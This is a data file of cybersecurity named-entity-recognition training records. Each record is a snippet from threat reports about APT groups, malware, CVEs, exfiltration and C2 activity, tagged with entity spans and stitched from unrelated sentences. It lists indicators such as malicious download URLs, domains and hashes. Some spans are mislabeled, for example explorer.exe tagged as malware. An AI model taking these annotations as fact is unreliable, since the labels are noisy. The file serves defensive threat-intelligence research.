{"text": "One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit .", "spans": {"TOOL: swissknife2": [[27, 38]], "ORGANIZATION: financial establishments": [[202, 226]]}, "info": {"id": "cyberner_stix_train_007127", "source": "cyberner_stix_train"}}
{"text": "As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . It is thus interesting to see Buhtrap add strategic web compromises to their arsenal .", "spans": {"TOOL: Bookworm": [[37, 45]], "TOOL: Trojan": [[52, 58]]}, "info": {"id": "cyberner_stix_train_007128", "source": "cyberner_stix_train"}}
{"text": "The stages of the FinFisher multi-layered protection mechanisms Stage 0 : Dropper with custom virtual machine The main dropper implements the VM dispatcher loop and can use 32 different opcodes handlers . The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia . Let’s start with who is not targeted . Because the cdhash is computed based on executable code in the application , Mandiant was able to identify additional malware in the environment despite the files being deleted by the threat actor and the samples having different file hashes .", "spans": {"MALWARE: FinFisher": [[18, 27]], "TOOL: Elise malware": [[209, 222]], "THREAT_ACTOR: Lotus Blossom": [[231, 244]], "ORGANIZATION: Mandiant": [[423, 431]]}, "info": {"id": "cyberner_stix_train_007129", "source": "cyberner_stix_train"}}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "VULNERABILITY: zero-day": [[180, 188]], "VULNERABILITY: CVE-2011-3544": [[301, 314]], "VULNERABILITY: CVE-2010-0738": [[362, 375]], "ORGANIZATION: Dell SecureWorks'": [[408, 425]]}, "info": {"id": "cyberner_stix_train_007130", "source": "cyberner_stix_train"}}
{"text": "Equipped reverse shell payload with specific string After an in-depth look , we found that some versions of the reverse shell payload code share similarities with PRISM – a stealth reverse shell backdoor that is available on Github . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises . In 2016 and 2017 , the group targeted managed IT service providers , manufacturing and mining companies , and a university .", "spans": {"MALWARE: PRISM": [[163, 168]], "ORGANIZATION: Github": [[225, 231]], "THREAT_ACTOR: OceanLotus's": [[234, 246]], "ORGANIZATION: maritime institutions": [[271, 292]], "ORGANIZATION: maritime construction": [[295, 316]], "ORGANIZATION: scientific research institutes": [[319, 349]], "ORGANIZATION: shipping enterprises": [[354, 374]]}, "info": {"id": "cyberner_stix_train_007131", "source": "cyberner_stix_train"}}
{"text": "This threat actor is remarkable for two reasons : Its access to sophisticated zero-day exploits for Microsoft and Adobe software Its use of an advanced piece of government-grade surveillance spyware FinFisher , also known as FinSpy and detected by Microsoft security products as Wingbird FinFisher is such a complex piece of malware that , like other researchers , we had to devise special methods to crack it . APT40 relies heavily on web shells for an initial foothold into an organization . The backdoor reports information about the machine such as the user name , computer name , Windows version and system language to the C&C server and awaits commands . • Cisco Talos has discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": {"ORGANIZATION: Microsoft": [[100, 109], [248, 257]], "ORGANIZATION: Adobe": [[114, 119]], "MALWARE: FinFisher": [[199, 208], [288, 297]], "MALWARE: FinSpy": [[225, 231]], "MALWARE: Wingbird": [[279, 287]], "THREAT_ACTOR: APT40": [[412, 417]], "TOOL: web shells": [[436, 446]], "SYSTEM: Windows": [[585, 592]], "ORGANIZATION: Cisco Talos": [[663, 674]], "ORGANIZATION: government entities": [[742, 761]], "ORGANIZATION: military organizations": [[764, 786]], "ORGANIZATION: civilian users": [[791, 805]]}, "info": {"id": "cyberner_stix_train_007132", "source": "cyberner_stix_train"}}
{"text": "The Web page shown here on the left is hosted on a domain that seems apt : free-vpn [ . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . In that case, it takes a . The United States is joining with allies and partners to condemn Russia ’s destructive cyber activities against Ukraine .", "spans": {"ORGANIZATION: FireEye": [[88, 95]], "THREAT_ACTOR: APT37": [[142, 147]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[160, 194]], "VULNERABILITY: CVE-2018-4878": [[197, 210]], "TOOL: DOGCALL malware": [[227, 242]], "ORGANIZATION: The United States": [[296, 313]], "THREAT_ACTOR: Russia ’s destructive cyber activities": [[361, 399]], "ORGANIZATION: Ukraine": [[408, 415]]}, "info": {"id": "cyberner_stix_train_007133", "source": "cyberner_stix_train"}}
{"text": "In the case of 32-bit systems , the malware may attempt a known UAC bypass by launching printui.exe system process and using token manipulation with NtFilterToken as described in this blog post . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . The way the payload is invoked ( by overwriting the return address on the stack , as opposed to a direct call ) . The Talos Threat Spotlight posts and Quarterly Trends reports provide details of threats and the techniques used by threat actors .", "spans": {"ORGANIZATION: CTU": [[196, 199]], "THREAT_ACTOR: threat actor": [[346, 358]], "THREAT_ACTOR: Mia Ash": [[374, 381]], "ORGANIZATION: Talos": [[502, 507]]}, "info": {"id": "cyberner_stix_train_007134", "source": "cyberner_stix_train"}}
{"text": "The majority of infected machines are located in the US , Bangladesh and the UK ;", "spans": {}, "info": {"id": "cyberner_stix_train_007135", "source": "cyberner_stix_train"}}
{"text": "First , it modifies the Zygote process . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": {"SYSTEM: Zygote": [[24, 30]], "VULNERABILITY: CVE-2018-8120": [[104, 117]], "TOOL: UACME": [[121, 126]], "ORGANIZATION: telecommunications": [[337, 355]], "ORGANIZATION: defense industries": [[360, 378]]}, "info": {"id": "cyberner_stix_train_007136", "source": "cyberner_stix_train"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . There has also been at least one victim targeted by a spear-phishing attack .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]]}, "info": {"id": "cyberner_stix_train_007137", "source": "cyberner_stix_train"}}
{"text": "125: UK , US , and Canada 220: UK and Australia 223: Germany 7200: UK 7500: Australia .", "spans": {}, "info": {"id": "cyberner_stix_train_007138", "source": "cyberner_stix_train"}}
{"text": "This domain is similar to the one the malware author used for his adware C & C communication , minigameshouse [ . RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . SHA256 : dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d .", "spans": {"MALWARE: RIPPER": [[114, 120]], "FILEPATH: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d": [[263, 327]]}, "info": {"id": "cyberner_stix_train_007139", "source": "cyberner_stix_train"}}
{"text": "Gaza Cybergang Group 3 in Operation Parliament : In this instance , the malware also used people ’s names for C2 communication to send and receive commands from the server .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "TOOL: C2": [[110, 112]]}, "info": {"id": "cyberner_stix_train_007140", "source": "cyberner_stix_train"}}
{"text": "The adversaries then issue HTTP GET requests , sometimes with the User-Agent MINIXL , to exfiltrate the archive parts from the victim's network .", "spans": {"TOOL: User-Agent": [[66, 76]], "TOOL: MINIXL": [[77, 83]]}, "info": {"id": "cyberner_stix_train_007141", "source": "cyberner_stix_train"}}
{"text": "Further analysis of the malware identified what looks like a custom back door .", "spans": {"TOOL: back door": [[68, 77]]}, "info": {"id": "cyberner_stix_train_007142", "source": "cyberner_stix_train"}}
{"text": "Each of these behaviors is under the control of the remote C2 server . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . From this URL it tries to download another stage then storing it into “ C:\\Users\\admin\\AppData\\Roaming\\ ” path with random name . NjRAT is an open - source remote access trojan ( RAT ) whose source code is freely available and is used by commodity actors and APTs , making the process of attribution more difficult .", "spans": {"ORGANIZATION: Kaspersky": [[88, 97]], "VULNERABILITY: zero-day exploit": [[123, 139]], "THREAT_ACTOR: BlackOasis": [[148, 158]], "MALWARE: NjRAT": [[343, 348]], "THREAT_ACTOR: commodity actors": [[451, 467]], "THREAT_ACTOR: APTs": [[472, 476]]}, "info": {"id": "cyberner_stix_train_007143", "source": "cyberner_stix_train"}}
{"text": "UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run . The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . The library code performs numerous checks for the CPU features , and based on the outcome , it will choose a processor-specific implementation of the cryptographic function . The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP ’s primary capabilities and contains many developer - supplied comments for the included code .", "spans": {"THREAT_ACTOR: attacker": [[157, 165]]}, "info": {"id": "cyberner_stix_train_007144", "source": "cyberner_stix_train"}}
{"text": "It is worth noting that shortly before the attack , security vendors reported the use of 0-day exploits in Flash Player and Microsoft Windows by the same threat actor .", "spans": {"VULNERABILITY: 0-day": [[89, 94]], "TOOL: Flash Player": [[107, 119]], "ORGANIZATION: Microsoft": [[124, 133]], "SYSTEM: Windows": [[134, 141]]}, "info": {"id": "cyberner_stix_train_007145", "source": "cyberner_stix_train"}}
{"text": "The existence of the Equation Group was first posited in Feb. 2015 by researchers at Russian security firm Kaspersky Lab , which described it as one of the most sophisticated cyber attack teams in the world . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"ORGANIZATION: security firm": [[93, 106]], "ORGANIZATION: Kaspersky Lab": [[107, 120]], "ORGANIZATION: Central Bank 's Automated Workstation Client": [[299, 343]], "ORGANIZATION: ATMs": [[348, 352]]}, "info": {"id": "cyberner_stix_train_007146", "source": "cyberner_stix_train"}}
{"text": "% 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html In China alone , we have seen underground market sheep shavers” ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . APT12 : IXESHE , DynCalc , Numbered Panda , DNSCALC .", "spans": {"THREAT_ACTOR: sheep shavers”": [[391, 405]], "THREAT_ACTOR: APT12": [[491, 496]], "THREAT_ACTOR: IXESHE": [[499, 505]], "THREAT_ACTOR: DynCalc": [[508, 515]], "THREAT_ACTOR: Numbered Panda": [[518, 532]], "THREAT_ACTOR: DNSCALC": [[535, 542]]}, "info": {"id": "cyberner_stix_train_007147", "source": "cyberner_stix_train"}}
{"text": "If the user wants to check which app is responsible for the ad being displayed , by hitting the “ Recent apps ” button , another trick is used : the app displays a Facebook or Google icon , as seen in Figure 6 . The malware may inject itself into browser processes and explorer.exe . We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible .", "spans": {"ORGANIZATION: Facebook": [[164, 172]], "ORGANIZATION: Google": [[176, 182]], "TOOL: malware": [[216, 223]], "MALWARE: explorer.exe": [[269, 281]]}, "info": {"id": "cyberner_stix_train_007148", "source": "cyberner_stix_train"}}
{"text": "By : Trend Micro April 20 , 2018 We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35) , a suspected Indian APT group . Paying more attention during the code analysis , we discovered that it is full of junk instructions used to declare and initialize variables never used .", "spans": {"ORGANIZATION: Trend Micro": [[5, 16]], "THREAT_ACTOR: DoNot Team": [[257, 267]]}, "info": {"id": "cyberner_stix_train_007149", "source": "cyberner_stix_train"}}
{"text": "Nbtscan — This publicly available command-line tool scans systems for NetBIOS name information ( see Figure 2 ) .", "spans": {"TOOL: Nbtscan": [[0, 7]]}, "info": {"id": "cyberner_stix_train_007150", "source": "cyberner_stix_train"}}
{"text": "Spaghetti code makes the program flow hard to read by adding continuous code jumps , hence the name . iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) . We have seen it installed as a Windows service and as a DLL in C:\\Windows\\System32 using the following file names : The threat actor was consistently observed removing prior payloads from disk ; however , the FSEvents artifacts were able to provide great insight into files that previously existed on disk .", "spans": {"ORGANIZATION: iDefense": [[102, 110]], "ORGANIZATION: ASEAN Defence Minister 's Meeting": [[226, 259]], "ORGANIZATION: ADMM": [[262, 266]], "SYSTEM: Windows": [[302, 309]], "TOOL: DLL": [[327, 330]], "SYSTEM: FSEvents artifacts": [[480, 498]]}, "info": {"id": "cyberner_stix_train_007151", "source": "cyberner_stix_train"}}
{"text": "One certificate was generated locally on what appeared to be a HP-UX box , and another was generated on 8569985.securefastserver.com with an email address root@8569985.securefastserver.com , as seen here for their nethostnet.com domain .", "spans": {"SYSTEM: HP-UX": [[63, 68]], "DOMAIN: 8569985.securefastserver.com": [[104, 132]], "TOOL: email": [[141, 146]], "EMAIL: root@8569985.securefastserver.com": [[155, 188]], "DOMAIN: nethostnet.com": [[214, 228]]}, "info": {"id": "cyberner_stix_train_007152", "source": "cyberner_stix_train"}}
{"text": "Artifacts During the research , we found plenty of traces of the developers and those doing the maintaining . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . The admin@338 has targeted international media organizations in the past .", "spans": {"MALWARE: Ursnif": [[186, 192]], "MALWARE: Urlzone": [[197, 204]], "THREAT_ACTOR: admin@338": [[227, 236]], "ORGANIZATION: international media organizations": [[250, 283]]}, "info": {"id": "cyberner_stix_train_007153", "source": "cyberner_stix_train"}}
{"text": "All MiniDuke components , from the loader and downloader to the backdoor , had been slightly updated and modified during the downtime .", "spans": {"MALWARE: MiniDuke": [[4, 12]]}, "info": {"id": "cyberner_stix_train_007154", "source": "cyberner_stix_train"}}
{"text": "' to disguise the Base64 . After injecting Meterpreter into memory , the attacker had complete control of the infected device . The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 .", "spans": {"THREAT_ACTOR: attacker": [[73, 81]]}, "info": {"id": "cyberner_stix_train_007155", "source": "cyberner_stix_train"}}
{"text": "Separate administrators into privilege tiers with limited access to other tiers .", "spans": {}, "info": {"id": "cyberner_stix_train_007156", "source": "cyberner_stix_train"}}
{"text": "DHS and FBI assess that HIDDEN COBRA actors will continue to use cyber operations to advance their government 's military and strategic objectives .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]], "THREAT_ACTOR: HIDDEN COBRA": [[24, 36]]}, "info": {"id": "cyberner_stix_train_007157", "source": "cyberner_stix_train"}}
{"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]], "MALWARE: Lambert family malware": [[221, 243]], "ORGANIZATION: FireEye": [[294, 301]], "VULNERABILITY: zero day": [[324, 332]], "VULNERABILITY: exploit": [[333, 340]], "VULNERABILITY: CVE-2014-4148": [[343, 356]]}, "info": {"id": "cyberner_stix_train_007158", "source": "cyberner_stix_train"}}
{"text": "In particular , we noted that the Sofacy group deployed a webpage on each of the domains .", "spans": {"THREAT_ACTOR: Sofacy": [[34, 40]]}, "info": {"id": "cyberner_stix_train_007159", "source": "cyberner_stix_train"}}
{"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam .", "spans": {"VULNERABILITY: CVE-2019-0752": [[25, 38]], "ORGANIZATION: Trend Micro’s": [[90, 103]], "FILEPATH: Bemstour": [[199, 207]]}, "info": {"id": "cyberner_stix_train_007160", "source": "cyberner_stix_train"}}
{"text": "] com Unit 42 published a blog in July 2016 about 9002 malware being delivered using a combination of shortened links and a file hosted on Google Drive . In another instance , APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"MALWARE: 9002": [[50, 54]], "THREAT_ACTOR: APT41": [[176, 181]], "THREAT_ACTOR: APT32": [[425, 430]], "ORGANIZATION: governments": [[457, 468]], "ORGANIZATION: dissidents": [[493, 503]], "ORGANIZATION: journalists": [[508, 519]]}, "info": {"id": "cyberner_stix_train_007161", "source": "cyberner_stix_train"}}
{"text": "Port 6209 : Telegram extraction service . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . News about Hamas and the Palestinian National Authority . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 ’s domain for hosting his own private blog .", "spans": {"SYSTEM: Telegram": [[12, 20]], "VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[129, 186]], "VULNERABILITY: CVE-2014-6332": [[189, 202]], "ORGANIZATION: Palestinian National Authority": [[287, 317]], "THREAT_ACTOR: Hack520": [[393, 400]]}, "info": {"id": "cyberner_stix_train_007162", "source": "cyberner_stix_train"}}
{"text": "This can be packaged and \" sold '' in many different ways to customers . As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . These development efforts may have resulted in the emergence of the WATERSPOUT backdoor . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": {"MALWARE: WATERSPOUT backdoor": [[338, 357]]}, "info": {"id": "cyberner_stix_train_007163", "source": "cyberner_stix_train"}}
{"text": "The use of a white font coloring to hide contents within a weaponized document is a technique we had previously reported being used by the Sofacy group in a malicious macro attack .", "spans": {"THREAT_ACTOR: Sofacy": [[139, 145]]}, "info": {"id": "cyberner_stix_train_007164", "source": "cyberner_stix_train"}}
{"text": "The xxxx.exe file copies happiness.txt to C:\\PROGRAM FILES\\common files\\ODBC\\ODUBC.DLL and to C:\\WINDOWS\\system32\\jql.sys .", "spans": {"FILEPATH: xxxx.exe": [[4, 12]], "FILEPATH: happiness.txt": [[25, 38]], "FILEPATH: C:\\PROGRAM FILES\\common files\\ODBC\\ODUBC.DLL": [[42, 86]], "FILEPATH: C:\\WINDOWS\\system32\\jql.sys": [[94, 121]]}, "info": {"id": "cyberner_stix_train_007165", "source": "cyberner_stix_train"}}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "FILEPATH: Hussarini": [[263, 272]]}, "info": {"id": "cyberner_stix_train_007166", "source": "cyberner_stix_train"}}
{"text": "Some malicious files associated with these samples were titled the following : Council_of_ministres_decision Minutes of the Geneva Meeting on Troops Summary of today 's meetings.doc.exe The most important points of meeting the memory of the late President Abu Omar may Allah have mercy on him - Paper No . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan . That string is the base64 encoded version of “ s : 54 ” , meaning “ sleep for 54 minutes ” ( or hours , depending on the particular backdoor ) . As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": {"TOOL: ICEFOG": [[411, 417]], "ORGANIZATION: government organizations": [[433, 457]], "ORGANIZATION: defense industry": [[462, 478]], "ORGANIZATION: Nick Biasini": [[654, 666]], "ORGANIZATION: Talos Takes": [[698, 709]]}, "info": {"id": "cyberner_stix_train_007167", "source": "cyberner_stix_train"}}
{"text": "At that time , Rockloader was the initial payload downloaded by malicious attached JavaScript files .", "spans": {"MALWARE: Rockloader": [[15, 25]], "TOOL: JavaScript": [[83, 93]]}, "info": {"id": "cyberner_stix_train_007168", "source": "cyberner_stix_train"}}
{"text": "The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice .", "spans": {"TOOL: Flash": [[4, 9]], "TOOL: DealersChoice": [[101, 114]]}, "info": {"id": "cyberner_stix_train_007169", "source": "cyberner_stix_train"}}
{"text": "Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection .", "spans": {}, "info": {"id": "cyberner_stix_train_007170", "source": "cyberner_stix_train"}}
{"text": "Based on samples of Duke malware from 2012 , the Dukes do appear to have continued actively using and developing all of their tools .", "spans": {"THREAT_ACTOR: Duke": [[20, 24]], "THREAT_ACTOR: Dukes": [[49, 54]]}, "info": {"id": "cyberner_stix_train_007171", "source": "cyberner_stix_train"}}
{"text": "Additionally , the improvements we made to our protections have been enabled for all users of our security services . RASPITE targeting includes entities in the US , Middle East , Europe , and East Asia . Right after the PE entry point , the standard call to the C Runtime initialization ( __scrt_common_main_seh ) is hooked to launch the malicious payload before everything else . More information Over the course of three and a half years , OilRig has used various backdoors , starting with DanBot , as well as using the Shark backdoor in April 2021 before transitioning to the Milan backdoor and the new backdoor Marlin in August 2021 .", "spans": {"THREAT_ACTOR: RASPITE": [[118, 125]], "TOOL: __scrt_common_main_seh": [[290, 312]], "THREAT_ACTOR: OilRig": [[443, 449]], "MALWARE: DanBot": [[493, 499]], "MALWARE: Shark backdoor": [[523, 537]], "MALWARE: Milan backdoor": [[580, 594]], "MALWARE: Marlin": [[616, 622]]}, "info": {"id": "cyberner_stix_train_007172", "source": "cyberner_stix_train"}}
{"text": "The spear phishing emails had Myanmar political-themed lures and , if the 9002 C2 server responded , the Trojan sent system specific information along with the string “ jackhex ” . These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns . From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": {"MALWARE: 9002": [[74, 78]], "THREAT_ACTOR: APT41’s": [[252, 259]], "ORGANIZATION: consumer products corporations": [[374, 404]], "THREAT_ACTOR: APT32": [[451, 456]]}, "info": {"id": "cyberner_stix_train_007173", "source": "cyberner_stix_train"}}
{"text": "According to the hacking collective , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the Trojan .", "spans": {"MALWARE: Potao": [[217, 222]], "MALWARE: Trojan": [[521, 527]]}, "info": {"id": "cyberner_stix_train_007174", "source": "cyberner_stix_train"}}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Blackgear has been targeting various industries since its emergence a decade ago .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]]}, "info": {"id": "cyberner_stix_train_007175", "source": "cyberner_stix_train"}}
{"text": "The targets of these campaigns , according to Kaspersky , were located variously in Belgium , Hungary , Luxembourg and Spain .", "spans": {"ORGANIZATION: Kaspersky": [[46, 55]]}, "info": {"id": "cyberner_stix_train_007176", "source": "cyberner_stix_train"}}
{"text": "It steals money from the victim ’ s bank account . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target . Winnti : hpqhvsei.dll . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"THREAT_ACTOR: Winnti": [[163, 169]], "FILEPATH: hpqhvsei.dll": [[172, 184]], "THREAT_ACTOR: threat researcher": [[206, 223]], "VULNERABILITY: discovered an attacker ’s tooling via an open repository , downloaded all of the tools": [[247, 333]]}, "info": {"id": "cyberner_stix_train_007177", "source": "cyberner_stix_train"}}
{"text": "The database contained the last activity performed on around 60 compromised devices . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy Email Stealer” part of their arsenal . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries .", "spans": {"THREAT_ACTOR: TA505": [[90, 95]], "ORGANIZATION: Banking": [[195, 202]], "ORGANIZATION: Retail": [[207, 213]], "THREAT_ACTOR: HIDDEN COBRA actors": [[373, 392]], "MALWARE: FALLCHILL": [[416, 425]], "MALWARE: malware": [[426, 433]], "ORGANIZATION: aerospace": [[459, 468]], "ORGANIZATION: telecommunications": [[471, 489]], "ORGANIZATION: finance industries": [[496, 514]]}, "info": {"id": "cyberner_stix_train_007178", "source": "cyberner_stix_train"}}
{"text": "One ELF library , libloc4d.so , handles amongst other things the loading of the app-decoded ELF library file “ sux ” , as well as handling connectivity to the C2 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": {"THREAT_ACTOR: APT41": [[178, 183]], "MALWARE: JHUHUGIT": [[259, 267]], "TOOL: Java": [[365, 369]], "VULNERABILITY: zero-day": [[370, 378]], "VULNERABILITY: CVE-2015-2590": [[381, 394]]}, "info": {"id": "cyberner_stix_train_007179", "source": "cyberner_stix_train"}}
{"text": "Some of these same tools , identified by hash , were evaluated in a malware testing environment by a single user .", "spans": {}, "info": {"id": "cyberner_stix_train_007180", "source": "cyberner_stix_train"}}
{"text": "This payload is also used by the earlier versions of the implant . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Winnti Group : Blackfly .", "spans": {"ORGANIZATION: Cisco Talos": [[67, 78]], "THREAT_ACTOR: Winnti Group": [[199, 211]], "THREAT_ACTOR: Blackfly": [[214, 222]]}, "info": {"id": "cyberner_stix_train_007181", "source": "cyberner_stix_train"}}
{"text": "The user may not notice the Flash object on the page , as Word displays it as a tiny black box in the document , as seen in Figure 1 .", "spans": {"TOOL: Flash": [[28, 33]], "TOOL: Word": [[58, 62]]}, "info": {"id": "cyberner_stix_train_007182", "source": "cyberner_stix_train"}}
{"text": "BrainTest uses four privilege escalation exploits to gain root access on a device and to install a persistent malware as a system application . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing .", "spans": {"MALWARE: BrainTest": [[0, 9]], "VULNERABILITY: privilege escalation exploits": [[20, 49]], "TOOL: PIVY": [[144, 148], [410, 414]], "ORGANIZATION: chemical makers": [[222, 237]], "ORGANIZATION: government agencies": [[240, 259]], "ORGANIZATION: defense contractors": [[262, 281]], "THREAT_ACTOR: attackers": [[352, 361]], "VULNERABILITY: zero-day vulnerability": [[369, 391]], "MALWARE: EvilGrab": [[461, 469]], "MALWARE: ChChes": [[480, 486]], "MALWARE: RedLeaves": [[505, 514]]}, "info": {"id": "cyberner_stix_train_007183", "source": "cyberner_stix_train"}}
{"text": "Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet . Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants .", "spans": {"MALWARE: winword.exe": [[237, 248]], "MALWARE: Start-Process": [[267, 280]], "MALWARE: cmdlet": [[281, 287]], "MALWARE: Bankshot": [[290, 298]], "ORGANIZATION: Department of Homeland Security": [[325, 356]]}, "info": {"id": "cyberner_stix_train_007184", "source": "cyberner_stix_train"}}
